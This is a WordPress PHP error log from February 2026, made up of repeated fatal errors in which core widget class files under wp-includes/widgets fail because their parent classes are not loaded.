[11-Feb-2026 07:17:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[11-Feb-2026 08:19:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[11-Feb-2026 10:45:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[11-Feb-2026 14:30:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[11-Feb-2026 21:36:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[11-Feb-2026 22:05:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[12-Feb-2026 01:02:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[12-Feb-2026 02:56:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[12-Feb-2026 04:23:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[12-Feb-2026 05:06:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[12-Feb-2026 05:08:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[12-Feb-2026 08:55:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[12-Feb-2026 09:25:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[12-Feb-2026 10:01:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[12-Feb-2026 14:41:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[12-Feb-2026 15:25:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[12-Feb-2026 17:36:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[13-Feb-2026 00:27:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[13-Feb-2026 02:29:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[13-Feb-2026 04:40:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[13-Feb-2026 05:17:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[13-Feb-2026 05:25:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[13-Feb-2026 05:44:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[13-Feb-2026 06:26:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[13-Feb-2026 06:26:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[13-Feb-2026 07:19:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[13-Feb-2026 07:19:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[13-Feb-2026 07:38:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[13-Feb-2026 08:11:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[13-Feb-2026 08:12:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[13-Feb-2026 08:13:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[13-Feb-2026 10:21:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[13-Feb-2026 11:29:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[13-Feb-2026 12:51:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[13-Feb-2026 12:51:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[13-Feb-2026 12:51:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[13-Feb-2026 12:51:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[13-Feb-2026 17:52:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[13-Feb-2026 22:24:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[14-Feb-2026 00:14:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[14-Feb-2026 00:49:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[14-Feb-2026 15:33:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[14-Feb-2026 23:46:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[15-Feb-2026 03:28:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[15-Feb-2026 04:56:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[15-Feb-2026 05:04:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[15-Feb-2026 05:13:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[15-Feb-2026 07:27:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[15-Feb-2026 08:22:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[15-Feb-2026 09:14:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[15-Feb-2026 09:47:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[15-Feb-2026 17:12:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[16-Feb-2026 00:34:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[16-Feb-2026 00:55:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[16-Feb-2026 01:12:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[16-Feb-2026 08:07:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[16-Feb-2026 13:28:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[16-Feb-2026 15:39:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[16-Feb-2026 21:11:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[17-Feb-2026 03:52:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[17-Feb-2026 04:26:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[17-Feb-2026 04:49:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[17-Feb-2026 05:08:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[17-Feb-2026 06:19:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[17-Feb-2026 06:49:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[17-Feb-2026 06:55:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[17-Feb-2026 07:38:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[17-Feb-2026 08:09:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[17-Feb-2026 08:23:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[17-Feb-2026 08:52:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[17-Feb-2026 09:52:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[17-Feb-2026 10:14:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[17-Feb-2026 16:09:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[17-Feb-2026 16:10:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[17-Feb-2026 17:59:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[17-Feb-2026 18:48:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[18-Feb-2026 00:40:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[18-Feb-2026 10:33:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[18-Feb-2026 10:57:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[18-Feb-2026 11:35:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[18-Feb-2026 12:25:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[18-Feb-2026 12:31:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[18-Feb-2026 12:45:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[18-Feb-2026 13:00:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[18-Feb-2026 21:22:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[18-Feb-2026 23:38:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[19-Feb-2026 01:47:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[19-Feb-2026 02:17:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[19-Feb-2026 02:21:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[19-Feb-2026 02:56:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[19-Feb-2026 07:38:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[19-Feb-2026 08:12:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[19-Feb-2026 08:13:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[19-Feb-2026 08:45:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[19-Feb-2026 21:00:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[19-Feb-2026 21:04:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[20-Feb-2026 12:22:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[20-Feb-2026 12:54:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[20-Feb-2026 22:16:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
